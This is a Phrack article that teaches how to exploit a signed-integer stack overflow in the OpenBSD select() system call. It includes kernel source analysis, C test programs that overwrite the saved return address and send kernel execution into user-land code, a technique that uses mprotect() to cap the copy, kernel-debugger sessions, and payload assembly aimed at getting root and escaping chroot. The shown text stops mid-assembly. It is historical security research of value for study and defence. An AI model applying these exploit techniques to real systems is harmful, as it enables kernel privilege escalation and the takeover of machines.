Zines/phrack/60/6.txt

                             ==Phrack Inc.==

               Volume 0x0b, Issue 0x3c, Phile #0x06 of 0x10

|=----------=[ Smashing The Kernel Stack For Fun And Profit ]=----------=|
|=----------------------------------------------------------------------=|
|=--------------=[ Sinan "noir" Eren <noir@olympos.org> ]=--------------=|


DISCLAIMER:
This article presented here is bound to no organization or company.  It is
the author's contrubition to the hacker community at large.  The research
and development in this article is done by the author with NO SUPPORT from
a commercial organization or company. No organization or company should be
held responsible or credited for this article other than the author
himself. 


--[ Contents

	1 - Introduction

	2 - The vulnerability: OpenBSD select() syscall overflow

	3 - Obstacles encountered in exploitation
	  3.1 - Overcoming the large copyin() problem
	    3.1.1 - mprotect() 4 life!
	  3.2 - Payload storage problem
	  3.3 - Return to user land problem

	4 - Crafting the exploit
	  4.1 - Breakpoints & distance Calculation
	  4.2 - Return address overwrite & execution redirection

	5 - How to gather offsets & symbol addresses
	  5.1 - sysctl() syscall
	  5.2 - sidt technique & _kernel_text search
	  5.3 - _db_lookup() technique	    
	  5.4 - /usr/bin/nm, kvm_open(), nlist()
	  5.5 - %ebp fixup	

	6 - Payload/shellcode creation
	  6.1 - What to achieve
	  6.2 - The payload
	    6.2.1 - p_cred & u_cred
	    6.2.2 - chroot breaking
	    6.2.3 - securelevel
	  6.3 - Get root & escape jail

	7 - Conclusions

	8 - Greetings

	9 - References

	10 - Code


--[ 1 - Introduction


This article is about recent exposures of many kernel level vulnerabilities
and advances in their exploitation which leads to trusted (oops safe) and
robust exploits.

We will focus on 2 recent vulnerabilities in the OpenBSD kernel as our case
studies. Out of the these we will mainly concentrate on exploitation of the
select() system call buffer overflow. The setitimer() arbitrary memory
overwrite vulnerability will be explained in the code section of this
article (as inline comments, so as not to repeat what we have already
covered whilst exploring the select() buffer overflow).

This paper should not be viewed as an exploit construction tutorial, my
goal is, rather, to explore and demonstrate generic ways to exploit stack
overflows and signed/unsigned vulnerabilities in kernel space.

Case studies will be used to demonstrate these techniques, and reusable
*BSD "kernel level shellcodes" -- with many cool features! -- will be
presented.

There has been related work done by [ESA] and [LSD-PL], which may
complement this article.


--[ 2 - The Vulnerability: OpenBSD select() syscall overflow


sys_select(p, v, retval)
        register struct proc *p;
        void *v;
        register_t *retval;
{
        register struct sys_select_args /* {
                syscallarg(int) nd;
                syscallarg(fd_set *) in;
                syscallarg(fd_set *) ou;
                syscallarg(fd_set *) ex;
                syscallarg(struct timeval *) tv;
        } */ *uap = v;
        fd_set bits[6], *pibits[3], *pobits[3];
        struct timeval atv;
        int s, ncoll, error = 0, timo;
        u_int ni;

[1]     if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
                /* forgiving; slightly wrong */
                SCARG(uap, nd) = p->p_fd->fd_nfiles;
        }
[2]     ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
[3]     if (SCARG(uap, nd) > FD_SETSIZE) {

	...

	}
	...
#define getbits(name, x) \
[4]   if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \
            (caddr_t)pibits[x], ni))) \
                goto done;
[5]     getbits(in, 0);
        getbits(ou, 1);
        getbits(ex, 2);
#undef  getbits

	...

To make some sense out of the code above we need to decipher the SCARG
macro, which is extensively used in the OpenBSD kernel syscall handling
routines.

Basically, SCARG() is a macro that retrieves the members of the 'struct
sys_XXX_args' structures.

sys/systm.h:114
...
#if     BYTE_ORDER == BIG_ENDIAN
#define SCARG(p, k)     ((p)->k.be.datum)       /* get arg from args 
pointer */
#elif   BYTE_ORDER == LITTLE_ENDIAN
#define SCARG(p, k)     ((p)->k.le.datum)       /* get arg from args 
pointer */

sys/syscallarg.h:14
...
#define syscallarg(x)                                                   \
        union {                                                         \
                register_t pad;                                         \
                struct { x datum; } le;                                 \
                struct {                                                \
                        int8_t pad[ (sizeof (register_t) < sizeof (x))  \
                                ? 0                                     \
                                : sizeof (register_t) - sizeof (x)];    \
                        x datum;                                        \
                } be;                                                   \
        }


Access to structure members is performed via SCARG() in order to preserve
alignment along CPU register size boundaries, so that memory accesses will
be faster and more efficient.

In order to make use of the SCARG() macro, the declarations need to be done
as follows (example for select() syscall arguments):

sys/syscallarg.h:404
...
struct sys_select_args {
[6]     syscallarg(int) nd;
        syscallarg(fd_set *) in;
        syscallarg(fd_set *) ou;
        syscallarg(fd_set *) ex;
        syscallarg(struct timeval *) tv;
};

The vulnerability can be described as an insufficient check on the 'nd'
argument [6], which is used as the length parameter for userland to kernel
land copy operations.

Whilst there is a check [1] on the 'nd' argument (nd represents the highest
numbered descriptor plus one, in any of the fd_sets), which is checked
against the p->p_fd->fd_nfiles (the number of open descriptors that the
process is holding), this check is inadequate -- 'nd' is declared as signed
[6], so it can be negative, and therefore will pass the greater-than check
[1].

Then 'nd' is put through a macro [2], in order to calculate an unsigned
integer, 'ni', which will eventually be used as the the length argument for
the copyin operation.

howmany() [2] is defined as follows (sys/param.h line 175):

#define howmany(x, y)   (((x)+((y)-1))/(y))

Expansion of line [2] will look like as follows:

sys/types.h:157, 169
#define NBBY    8               /* number of bits in a byte */

typedef int32_t fd_mask;
#define NFDBITS (sizeof(fd_mask) * NBBY)        /* bits per mask */
...
ni = ((nd + (NFDBITS-1)) / NFDBITS)  * sizeof(fd_mask);
ni = ((nd + (32 - 1)) / 32) * 4

Calculation of 'ni' is followed by another check on the 'nd' argument [3].
This check is also passed, since OpenBSD developers consistently forget
about the signedness checks on the 'nd' argument. Check [3] was done to see
if the space allocated on the stack is sufficient for the following copyin
operations, and, if not, then sufficient heap space will be allocated.

Given the inadequacy of the signed check, we'll pass check [3] (>
FD_SETSIZE), and will continue using stack space. This will make our life
much easier, given that stack overflows are much more trivially exploited
than heap overflows. (Hopefully, I'll write a follow-up paper that will
demonstrate kernel-land heap overflows in the future).

Finally, the getbits() [4,5] macro is defined and called in order to
retrieve user supplied fd_sets (readfds, writefds, exceptfds -- these
arrays contain the descriptors to be tested for 'ready for reading', ready
for writing' or 'have an exceptional condition pending').

For exploitation purposes we don't really care about the layout of the
fd_sets -- they can be treated as any simple char buffer aiming to overflow
its boundaries and overwrite the saved ebp and saved eip.

With this simple test code, we can reproduce the overflow:

#include <stdio.h>
#include <sys/types.h>

int
main(void)
{
	char *buf;
	buf = (char *) malloc(1024);
	memset(buf, 0x41, 1024);
	select(0x80000000, (fd_set *) buf, NULL, NULL, NULL);
}
 
What happens is; system call number 93 (SYS_select) is dispatched to
handler sys_select() by the syscall() function, with all user land supplied
arguments bundled into a sys_select_args structure.

'nd', being 0x80000000 (the smallest negative number for signed 32bit) has
gone through the size check [1] and, later, the howmany() macro [2]
calculates unsigned integer 'ni' as 0x10000000. The getbits() macro [5] is
then called with the address of buf (user land, heap) which expands to the
copyin(buf, kernel_stack, 0x10000000) operation.

copyin() starts to copy the userland buffer to the kernel stack, a long at
a time (0x10000000/4 times). However, this copy operation won't ever fully
succeed, as the kernel will run out of per-process stack trying to copy
such a huge buffer from userland -- and will crash on an out of bounds
write operation.


--[ 3 - Obstacles encountered in exploitation


     - copyin(uaddr, kaddr, big_number) problem

First and the most obvious problem is to take control of the size argument
'ni' passed to the copyin operation, since this number is derived from the
user supplied 'nd' argument which, must be negative, we'll never be able to
construct a reasonably "big" number. Actually the "smallest" positive
number we can construct is 0x10000000. As we have already find out that,
this number will cause us to hit the end of kernel stack and kernel will
panic. This is our first obstacle and we'll overcome it by exploring how
copyin() works in the following section.

      - payload storage problem

This is a typical problem for every type of exploit (user or kernel land).
Determining where the most appropriate place is to store the
payload/shellcode.  This problem is rather simple to overcome in kernel
land exploits and we'll talk about the proper solution. 

      - clean return to user land problem

Another problem arises after we overwrite the saved return address and gain
control, at that point we can be real imaginative on the payload, but we'll
run into the trouble of how to return back to user land and be able to
enjoy our newly altered kernel space! 


--[ 3.1 - Overcoming The Large copyin() Problem


To be able to solve this problem, we need to read through the copyin() and
trap() functions and understand their internals.

We shall start by understanding copyin() user to kernel copy primitive, my
comments will be inlined:

sys/arch/i386/i386/locore.s:955

ENTRY(copyin)
        pushl   %esi
        pushl   %edi

Save %esi, %edi .

        movl    _C_LABEL(curpcb),%eax

Move the current process control block address (_curpcb) into %eax .
_C_LABEL() is a simple macro that will add an underscore sign to the
beginning of the symbol name. See sys/arch/i386/include/asm.h:66

The process control block is a per-process kernel structure that holds the
current execution state of a process and differs based on machine
architecture. It consists of: stack pointer, program counter, general-
purpose registers, memory management registers and some other architecture
depended members such as per process LDT's (i386) and so on. The *BSD
kernel extends the PCB with software related entries, such as the
"copyin/out fault recovery" handler (pcb_onfault). Each process control
block is stored and referenced through the user structure. See
sys/user.h:61 and [4.4 BSD].

[1]    pushl   $0

Push a ZERO on the stack; this will make sense at the epilog or the
_copy_fault function, which has the matching 'popl' instruction.

[2]    movl    $_C_LABEL(copy_fault),PCB_ONFAULT(%eax)

Move _copy_fault's entry address into the process control block's
pcb_onfault member. This simply installs a special fault handler for
'protection', 'segment not present' and 'alignment' faults.  copyin()
installs its own fault handler, _copy_fault, we'll get back to this when
exploring the trap() code, since processor faults are handled there.

        movl    16(%esp),%esi
        movl    20(%esp),%edi
        movl    24(%esp),%eax

Move the incoming first, second and third arguments to %esi, %edi, %eax
respectively. %esi being the user land buffer, %edi the destination kernel
buffer and %eax the size.

    /*
     * We check that the end of the destination buffer is not past the end
     * of the user's address space.  If it's not, then we only need to
     * check that each page is readable, and the CPU will do that for us.
     */
        movl    %esi,%edx
        addl    %eax,%edx

This addition operation is to verify if the user land address plus the size
(%eax) is in legal user land address space. The user land address is moved
to %edx and then added to the size (ubuf + size), which will point to the
supposed end of the user land buffer.

        jc      _C_LABEL(copy_fault)

This is a smart check to see if previous addition operation has an integer
over-wrap issue. e.g: the user land address being 0x0ded and size being
0xffffffff -- this unsigned arithmetic operation will overlap and the
result is going to be 0x0dec. By design, the CPU will set the carry flag on
such condition and 'jc' jump short on carry flag set instruction will take
us to _copy_fault function which do some clean up and return EFAULT .

        cmpl    $VM_MAXUSER_ADDRESS,%edx
        ja      _C_LABEL(copy_fault)

Followed by the range check: whether or not the user land address plus size
is in valid user land address space range. A comparison is done against the
VM_MAXUSER_ADDRESS constant, which is the end of the user land stack
(0xdfbfe000 through obsd 2.6-3.1). If the sum (%edx) is above
VM_MAXUSER_ADDRESS 'ja' (jump above) instruction will make a short jump to
_copy_fault , eventually leading to the termination of the copy operation.

3:      /* bcopy(%esi, %edi, %eax); */
        cld

Clear the direction flag, DF = 0, means that the copy operation is going to
increment the index registers '%esi and %edi' .

        movl    %eax,%ecx
        shrl    $2,%ecx
        rep
        movsl

Do the copy operation long at a time, from %esi to %edi .

        movb    %al,%cl
        andb    $3,%cl
        rep
        movsb

Copy the remaining (size % 4) data, byte at a time.

        movl    _C_LABEL(curpcb),%edx
        popl    PCB_ONFAULT(%edx)

Move the current process control block address into %edx, and then pop the
first value on the stack into the pcb_onfault member (ZERO [1] pushed
earlier). This means, the special fault handler is cleared from the
process.

        popl    %edi
        popl    %esi

Restore the old values of %edi, %esi .

        xorl    %eax,%eax
        ret

Do a return with a return value of zero: Success .

ENTRY(copy_fault)

In the case of faults and failures in checks at copyin() this is where we
drop.

        movl    _C_LABEL(curpcb),%edx
        popl    PCB_ONFAULT(%edx)

Move the current process control block address into %edx and then pop the
first value on the stack into the pcb_onfault member (ZERO [1] pushed
earlier). This clears the special fault handler from the process.

        popl    %edi
        popl    %esi

Restore the old values of %edi, %esi .

        movl    $EFAULT,%eax
        ret

Do a return with a return value of EFAULT (14): Failure .

After this long exploration of the copyin() function we'll just take a
brief look at trap() and check how pcb_onfault is implemented. trap() is
the main interface to exception, fault and trap handling of the BSD kernel.

trap.h:51:#define    T_PROTFLT        4      /* protection fault */
trap.h:63:#define    T_SEGNPFLT      16      /* segment not present fault 
*/
trap.h:54:#define    T_ALIGNFLT       7      /* alignment fault */

sys/arch/i386/i386/trap.c:174
void
trap(frame)
        struct trapframe frame;
{
        register struct proc *p = curproc;
        int type = frame.tf_trapno;
...
        switch (type) {

...
line: 269

        case T_PROTFLT:
        case T_SEGNPFLT:
        case T_ALIGNFLT:
                /* Check for copyin/copyout fault. */
[1]             if (p && p->p_addr) {
[2]                     pcb = &p->p_addr->u_pcb;
[3]                     if (pcb->pcb_onfault != 0) {
                        copyfault:
[4]                             frame.tf_eip = (int)pcb->pcb_onfault;
                                return;
                        }
                }

...

Faults such as 'protection', 'segment not present' and 'alignment' are
handled all together, through a switch statement in trap() code. The
appropriate case for the mentioned faults in trap() , initially checks for
the existence of the process structure and the user structure [1] then
loads the process control block from the user structure [2], check if the
pcb_onfault is set [3] if its set, if so, the instruction pointer (%eip) of
the control block is overwritten with the value of this special fault
handler [4]. After the process is context switched and given the cpu, it
will start running from the new handler code in kernel space. In the case
of copyin() , execution will be redirected to _copy_fault . 

Armoured with all this knowledge, we can now provide a solution for the
'big size copyin()' problem.


--[ 3.1.1 - mprotect() 4 life!


x86 cpu memory operations such like trying to read from write only (-w-)
page or trying to write to a read only (r--) or no access (---) page and
some other combinations will throw out a protection fault which will be
handled by trap() code as shown above. 

This basic functionality will allow us to write as many bytes into kernel
space as we wish, no matter how big the size value actually is. As seen
above, the trap() code checks for pcb_onfault handler for protection faults
and redirects execution to it. In order to stop copying from user land to
kernel land, we will need to turn off the read protection bit of any
certain page following the overflow vector and achieve our goal.

-------------
|    rwx    | --> Dynamically allocated PAGE_SIZEd 
|           |     user land memory
|           |
|xxxxxxxxxxx| --> Overflow vector (fd_set array)
-------------     (saved %ebp, %eip overwrite values)
|    -w-    |
|           |
|           | --> Dynamically allocated PAGE_SIZEd 
|           |     consecutive memory, PROT_WRITE
-------------

The way to control the overflow as described in the diagram is to allocate
2 PAGE_SIZEd memory chunks and fill the end of the first page with overflow
data (exploitation vector) and then turn off the read protection bit of the
following page. 

At this stage we also run into another problem (albeit rather simple to
overcome). PAGE_SIZE is 4096 in x86 and 4096 bytes of overflowed stack will
crash the kernel at an earlier stage (before we take control). 

Actually for this specific overflow saved %ebp and saved %eip is 192 and
196 bytes away from the overflowed buffer, respectively. So, what we'll do
is allocate 2 pages and pass the fd_set pointer as 'second_page - 200'.
Then copyin() will start copying just 200 bytes before the end of the
readable page and will hit the non readable page right after. An expection
will be thrown and trap() will handle the fault as explained, 'protection
fault' handler will check pcb_onfault and set the instruction pointer of
the current PCB to the address of the handler, in this case _copy_fault.
_copy_fault will return EFAULT. 

If we go back to the sys_select() code getbits() macro [4] will check for
the return value and will go to 'done' label on any value other than
success (0). At this point sys_select() set the error code (errno) and
return to syscall() (syscall dispatcher).


Here is the test code to verify the mprotect technique:

#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>

int
main(void)
{
        char *buf;
	u_long pgsz = sysconf(_SC_PAGESIZE);

        buf = (char *) malloc(pgsz * 3);
	/* asking for 3 pages, just to be safe */
	if(!buf) { perror("malloc"); exit(-1); }
        memset(buf, 0x41, pgsz*3); /* 0x41414141 ;) */

	buf = (char *) (((u_long) buf & ~pgsz) + pgsz);
	/* actually, we'r using the 2. and 3. pages*/

	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
		PROT_WRITE) < 0)
	{
		perror("mprotect"); exit(-1);
	}
	/* we set the 3rd page as WRITE only, 
	 * anything other than READ is fine 
	 */
	
	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,
		NULL, NULL);
}

- The ddb> kernel debugger

To be able to debug the kernel we will need to set up the ddb kernel
debugger. Type the following commands to make sure ddb is set and don't
forget that, you should have some sort of console access to be able to
debug the kernel. (Physical access, console cable or those funky network
console devices...)

bash-2.05a# sysctl -w ddb.panic=1
ddb.panic: 1 -> 1
bash-2.05a# sysctl -w ddb.console=1
ddb.console: 1 -> 1

The first sysctl command configures ddb to kick in on kernel panics. The
latter will set up ddb accessible from console at any given time, with the
ESC+CTRL+ALT key combination.

There is no way to explore kernel vulnerabilities without many panic()s
getting in the way, so lets get dirty.

bash-2.05a# gcc -o test2 test2.c 
bash-2.05a# sync
bash-2.05a# sync
bash-2.05a# uname -a
OpenBSD kernfu 3.1 GENERIC#59 i386
bash-2.05a# ./test2
uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e
kernel: page fault trap, code=0
Stopped at	0x41414141:uvm_fault(0xe4536c6c, 0x41414000, 0, 1) -> e
...

ddb> trace
...
_kdb_trap(6,0,e462af08,1) at _kdb_trap+0xc1
_trap() at _trap+0x1b0
--- trap (number 6) ---
0x41414141:
ddb>

What all this means is that a page fault trap was taken from for address
0x41414141 and since this is an invalid address for kernel land, it was not
able to be paged in (such like every illegal address reference) which lead
to a panic(). This means we are on the right track and indeed overwrite the
%eip since the page 0x41414000 was attempted to loaded into memory.

Type following for a clean reboot.
ddb> boot sync
....

Lets verify that we gain the control by overwriting the %eip - here is how
to set the appropriate breakpoints: 

Hit CTRL+ALT+ESC: 

ddb> x/i _sys_select,130
_sys_select:	pushl	%ebp
_sys_select+0x1:	movl	%esp,%ebp
...
...
_sys_select+0x424:	leave
_sys_select+0x425:	ret
_sys_select+0x426:	nop
...
ddb> break _sys_select+0x425
ddb> cont
^M	--> hit enter!
bash-2.05a# 

At this stage some other process might kick ddb> in because of its use of
the select syscall, just type 'cont' on the ddb> prompt and hit CR.

bash-2.05a# ./test2 
...
ddb> print $ebp
41414141
ddb> x/i $eip
_sys_select+0x425:	ret
ddb> x/x $esp
0xe461df3c:	41414141 --> saved instruction pointer!
ddb> boot sync
...


--[ 3.2 - Payload storage problem


The payload storage area for user land vulnerabilities is usually the
overflowed buffer itself (if it's big enough) or some known user controlled
other location such like environment variables, pre-overflow command
leftovers, etc, etc, in short, any user controlled memory that will stay
resident long enough to reference at a later time. Since the overflowed
buffer may be small in size, it is not always feasible to store the payload
there. Actually, for this specific buffer overflow, the contents of the
overflowed buffer get corrupted leaving us no chance to return to it. Also,
we will need enough room to execute code in kernel space to be able to do
complex tasks, such as resetting the chroot pointers, altering pcred, ucred
and securelevel and resolving where to return to ... for all these reasons
we are going to execute payload in the source buffer as opposed to the
destination (overflowed) buffer. This means we're going to jump to the user
land page, execute our payload and return back to our caller transparently.
This is all legitimate execution and we will have almost unlimited space to
execute our payload. In regards to the select() overflow: copyin(ubuf,
kbuf, big_num), we'll execute code inside 'ubuf'.
 

--[ 3.3 - Return to user land problem


After we gain control and execute our payload, we need to clean things up
and start our journey to user land but this isn't as easy as it may sound.
My first approach was to do an 'iret' (return from interrupt) in the
payload after altering all necessary kernel structures but this approach
turn out to be real painful. First of all, it's not an easy task to do all
the post-syscall handling done by syscall() function. Also, the trap() code
for kernel to user land transition can not be easily turn into payload
assembly code. However the most obvious reason, not to choose the 'iret'
technique is that messing with important kernel primitives such as locks,
pending signals and/or mask-able interrupts is a really risky job thus
drastically reducing the reliability of exploits and increasing the
potential for post exploitation kernel panics. So I choose to stay out of
it! ;)

The solution was obvious, after payload execution we should return to the
point in syscall() handler where _sys_select() was supposed to return.
After that point, we don't need to care about any of the aforementioned
kernel primitives. This solution leads to the question of how to find out
where to return into since we have overwritten the return address to gain
control thus losing our caller's location. We will explorer many of the
possible solutions in section 5 and usage of the idtr register for kernel
land address gathering will be introduced on section 5.2 for some serious
fun!! Let's get going ...


--[ 4 - Crafting the exploit


In this section, setting up of proper breakpoints and how to calculate the
distance to the saved instruction pointer will be discussed. Also, a new
version of test code will be presented in order to demostrate that
execution can be successfully directed to the user land buffer.


--[ 4.1 - Breakpoints & Distance Calculation


bash-2.05a# nm /bsd | grep _sys_select
e045f58c T _linux_sys_select
e01c5a3c T _sys_select
bash-2.05a# objdump -d --start-address=0xe01c5a3c --stop-
address=0xe01c5e63\
>  /bsd | grep _copyin
e01c5b72:       e8 f9 a9 f3 ff          call   e0100570 <_copyin>
e01c5b9f:       e8 cc a9 f3 ff          call   e0100570 <_copyin>
e01c5bcc:       e8 9f a9 f3 ff          call   e0100570 <_copyin>
e01c5bf9:       e8 72 a9 f3 ff          call   e0100570 <_copyin>

The first copyin() is the one that copies the readfds and overflows the
kernel stack. That's the one we are after.

CTRL+ALT+ESC
bash-2.05a# Stopped at _Debugger+0x4: leave
ddb> x/i 0xe01c5b72
_sys_select+0x136:	call	_copyin
ddb> break _sys_select+0x136
ddb> cont
^M
bash-2.05a# ./test2
Breakpoint at	_sys_select+0x136:	call	_copyin
ddb> x/x $esp,3
0xe461de20:	5f38	e461de78	10000000

These are the 3 arguments pushed on the stack for copyin() ubuf: 0x5f38
kbuf: 0xe461de78 len:10000000

ddb> x/x 0x5f38
0x5f38:	41414141
...
ddb> x/x $ebp
0xe461df38:	e461dfa8	--> saved %ebp
ddb> ^M
0xe461df3c:	e02f34ce	--> saved %eip 
ddb>

In the x86 calling convention, 2 longs just before the base pointer are the
saved eip (return address) and the saved ebp, respectively. To calculate
the distance between the stack buffer and the saved eip in ddb is done as
follows:

ddb> print 0xe461df3c - 0xe461de78
      c4 
ddb> boot sync
...

The distance between the address of saved "return address" and the kernel
buffer is 196 (0xc4) bytes. Limiting our copyin() operation to 200 bytes
with the mprotect() technique will ensure a clean overflow.


4.2 - Return address overwrite & execution redirection


At this stage I'll introduce another test code to "verify" execution
redirection and usability of the user land buffer for payload execution.

test3.c:

#include <stdio.h>
#include <sys/types.h>
#include <sys/mman.h>
#include <unistd.h>

int
main(void)
{
        char *buf;
        long *lptr;
        u_long pgsz = sysconf(_SC_PAGESIZE);

        buf = (char *) malloc(pgsz * 3);
        if(!buf) { perror("malloc"); exit(-1); }
        memset(buf, 0xcc, pgsz*3); /* int3 */

        buf = (char *) (((u_long) buf & ~pgsz) + pgsz);

	if(mprotect((char *) ((u_long) buf + pgsz), (size_t) pgsz,
		PROT_WRITE) < 0)
        {
		perror("mprotect"); exit(-1);
	}


        lptr = (long *) ((u_long)buf + pgsz - 8);
        *lptr++ = 0xbaddcafe; /* saved %ebp, does not 
			       * matter at this stage
			       */
        *lptr++ = (long) buf; /* overwrite the return addr 
			       * with buf's addr
			       */
	select(0x80000000, (fd_set *) ((u_long) buf + pgsz - 200), NULL,
		NULL, NULL);
}
 

test3.c code will overwrite the saved ebp with 0xbaddcafe and the saved
instruction pointer with the address of the user land buffer, which is
filled with 'int 3''s (debug interrupts). This code should kick in the
kernel debugger.

bash-2.05a# gcc -o test3 test3.c
bash-2.05a# ./test3
Stopped at	0x5001:	int	$3
ddb> x/i $eip,2
0x5001:	int	$3
0x5002: int	$3
ddb> print $ebp
baddcafe
ddb> boot sync
...

Everything goes as planned, we successfully jump to user land and execute
code. Now we shall concentrate on other issues such as payload/shellcode
creation, symbol address gathering on run time, etc...


--[ 5 - How to gather offsets & symbol addresses


Before considering what to achieve with kernel payload, I should remind you
about the previous questions that we raised which was how to return back to
user land, the proposed solution was basically to fix up %ebp, find out
where syscall() handler is in memory, plus where in syscall() we should be
returning. Payload is the obvious place to do the mentioned fix- ups but
this brings the complication of how to gather kernel addresses. After
dealing with some insufficient pre-exploitation techniques such like 'nm
/bsd', kvm_open() and nlist() system interfaces which are all lacking the
solution for non-reable (in terms of fs permissions) kernel image (/bsd).
I come to the conclusion that all address gathering should be done on run
time (in the execution state of the payload). Many win32 folks have been
doing this type of automation in shellcodes by walking through the thread
environment block (TEB) for some time. Also kernel structures such like the
process structure has to be supplied to the payload in order to achieve our
goals. Following sections would introduce the proposed solutions for kernel
space address gathering.


--[ 5.1 - sysctl() syscall


sysctl() system call will enable us to gather process structure information
which is needed for the credential and chroot manipulation payloads. In
this section we will take a brief look into the internals of the sysctl()
syscall.

sysctl is a system call to get and set kernel level information from user
land. It has a good interface to pass data from kernel to user land and
back. sysctl interface is structured into several sub components such as
the kernel, hardware, virtual memory, net, filesystem and architecure
system control interfaces. We'll concentrate on the kernel sysctl's which
is handled by the kern_sysctl()function. See: sys/kern/kern_sysctl.c:234
kern_sysctl() function also assigns different handlers to certain queries
such as proc structure, clockrate, vnode and file information. The process
structure is handled by the sysctl_doproc() function and this is the
interface to kernel land information that we are after!

int
sysctl_doproc(name, namelen, where, sizep)
        int *name;
        u_int namelen;
        char *where;
        size_t *sizep;
{

...

[1] for (; p != 0; p = LIST_NEXT(p, p_list)) {

...
[2]        switch (name[0]) {

                case KERN_PROC_PID:
                        /* could do this with just a lookup */
[3]                     if (p->p_pid != (pid_t)name[1])
                                continue;
                        break;

		...

	  }
		....

                if (buflen >= sizeof(struct kinfo_proc)) {
[4]                     fill_eproc(p, &eproc);
[5]                     error = copyout((caddr_t)p, &dp->kp_proc,
                                        sizeof(struct proc));
....


void
fill_eproc(p, ep)
        register struct proc *p;
        register struct eproc *ep;
{
        register struct tty *tp;

[6]        ep->e_paddr = p;


Also for sysctl_doproc() there can be different types of queries which are
handled by the switch [2] statement. KERN_PROC_PID is the query that is
sufficient enough to gather the needed address about any process's proc
structure. For the select() overflow it was sufficient enough just to
gather the parent process's proc address but the setitimer() vulnerability
make use of the sysctl() interface in many different ways (more on this
later).

sysctl_doproc() code iterates through [1] the linked list of proc
structures in order to find the queried pid [3], and, if found, certain
structures (eproc & kp_proc) get filled-in [4], [5] and copyout to user
land. fill_eproc() (called  from [4]) does the trick [6] and copies the
proc address of the queried pid into the e_paddr member of the eproc
structure, which, in turn, was eventually copied out to user land in the
kinfo_proc structure (which is the main data structure for the
sysctl_doproc() function). For further information on members of these
structures see: sys/sys/sysctl.h.

The following is the function we'll be using to retrieve the kinfo_proc
structure:

void
get_proc(pid_t pid, struct kinfo_proc *kp)
{
   u_int arr[4], len;
        
        arr[0] = CTL_KERN;
        arr[1] = KERN_PROC;
        arr[2] = KERN_PROC_PID;
        arr[3] = pid;
        len = sizeof(struct kinfo_proc);
        if(sysctl(arr, 4, kp, &len, NULL, 0) < 0) {
                perror("sysctl");
                exit(-1);
        }
         
}


It is a pretty straightforward interface, what happens is: CTL_KERN will be
dispatched to kern_sysctl() by sys_sysctl() KERN_PROC will be dispatched to
sysctl_doproc() by kern_sysctl() KERN_PROC_PID will be handled by the
aforementioned switch statement, eventually returning the kinfo_proc
structure.

<rant>
sysctl() system call might be there with all good intensions such as
getting and setting kernel information in a dynamic fashion. However, from
a security point of view, I believe sysctl() syscall should not be blindly
giving proc information about any queried pid. Credential checks should be
added in proper places, especially for the systcl_doproc() interface ...
</rant>


--[ 5.2 - sidt technique & _kernel_text search


As mentioned before, we are after transparent payload execution so that
_sys_select() will actually return to its caller _syscall() as expected.  I
will explain how to gather the return path in this section. The solution
depends on the idtr (interrupt descriptor table register) that contains a
fixed location address, which is the start of the Interrupt Descriptor
Table (IDT).

Without going into too many details, IDT is the table that holds the
interrupt handlers for various interrupt vectors. Each interrupt in x86 is
represented by a number in the range 0 - 255 and these numbers are called
the interrupt vectors. These vectors are used to locate the initial handler
for any given interrupt inside the IDT. IDT contains 256 entries, each
being 8 bytes. IDT descriptor entries can be 3 different types but we will
concentrate only on the gate descriptor:

sys/arch/i386/include/segment.h:99

struct gate_descriptor {
        unsigned gd_looffset:16;        /* gate offset (lsb) */
        unsigned gd_selector:16;        /* gate segment selector */
        unsigned gd_stkcpy:5;           /* number of stack wds to cpy */
        unsigned gd_xx:3;               /* unused */
        unsigned gd_type:5;             /* segment type */
        unsigned gd_dpl:2;              /* segment descriptor priority 
level */
        unsigned gd_p:1;                /* segment descriptor present */
        unsigned gd_hioffset:16;        /* gate offset (msb) */
}

gate_descriptor's members gd_looffset and gd_hioffset will form the low
level interrupt handler's address. For more information on the various
fields, reader should consult to the architecture manuals [Intel]. 

System call interface to request kernel services is implemented through the
software initiated interrupt: 0x80. Armored with this knowledge, starting
from the address of the low level syscall interrupt handler and walking
through the kernel text, we can find our way to the high level syscall
handler and finally return to it. 

Interrupt descriptor table under OpenBSD is named _idt_region and slot
number: 0x80 is the gate descriptor for the system call interrupt 'int
0x80'. Since every member is 8 bytes, system call gate_descriptor is at
address '_idt_region + 0x80 * 0x8' which is '_idt_region + 0x400'. 

bash-2.05a# Stopped at		_Debugger+0x4: leave
ddb> x/x _idt_region+0x400
_idt_region+0x400:	80e4c
ddb> ^M
_idt_region+0x404:	e010ef00

To figure out the initial syscall handler we need to do the proper 'shift'
and 'or' operations on the gate descriptor bit fields, which leads to the
0xe0100e4c kernel address.

bash-2.05a# Stopped at          _Debugger+0x4: leave
ddb> x/x 0xe0100e4c
_Xosyscall_end:	pushl	$0x2
ddb> ^M
_Xosyscall_end+0x2:	pushl	$0x3
...
...
_Xosyscall_end+0x20:	call	_syscall
...

As per exception or software initiated interrupt, the corresponding vector
is found in the IDT and the execution is redirected to the handler gathered
from the gate descriptor. This is an intermediate handler and will
eventually take us to real handler. As seen at the kernel debugger output,
the initial handler _Xosyscall_end saves all registers (also some other low
level stuff) and immediately calls the real handler which is _syscall().

We have mentioned that the idtr register always contains the address of the
_idt_region, here is the way to access its content:

sidt 0x4(%edi)
mov  0x6(%edi),%ebx  

Address of the _idt_region is moved to ebx and IDT can now be referenced
via ebx. Assembly code to gather the syscall handler starting from the
initial handler is as follows;

sidt 0x4(%edi)
mov  0x6(%edi),%ebx     # mov _idt_region is in ebx
mov  0x400(%ebx),%edx   # _idt_region[0x80 * (2*sizeof long) = 0x400]
mov  0x404(%ebx),%ecx   # _idt_region[0x404]
shr  $0x10,%ecx	        #
sal  $0x10,%ecx	        # ecx = gd_hioffset
sal  $0x10,%edx	        #
shr  $0x10,%edx         # edx = gd_looffset
or   %ecx,%edx          # edx = ecx | edx  =  _Xosyscall_end

At this stage we have successfully found the initial/intermediate handler's
location, so the next step is to search through the kernel text, find 'call
_syscall', gather the displacement of the call instruction and add it to
the address of the instruction's location. Also plus 5 should be added to
the displacement for the size of the call instruction.

xor  %ecx,%ecx          # zero out the counter
up:
inc  %ecx
movb (%edx,%ecx),%bl    # bl =  _Xosyscall_end++
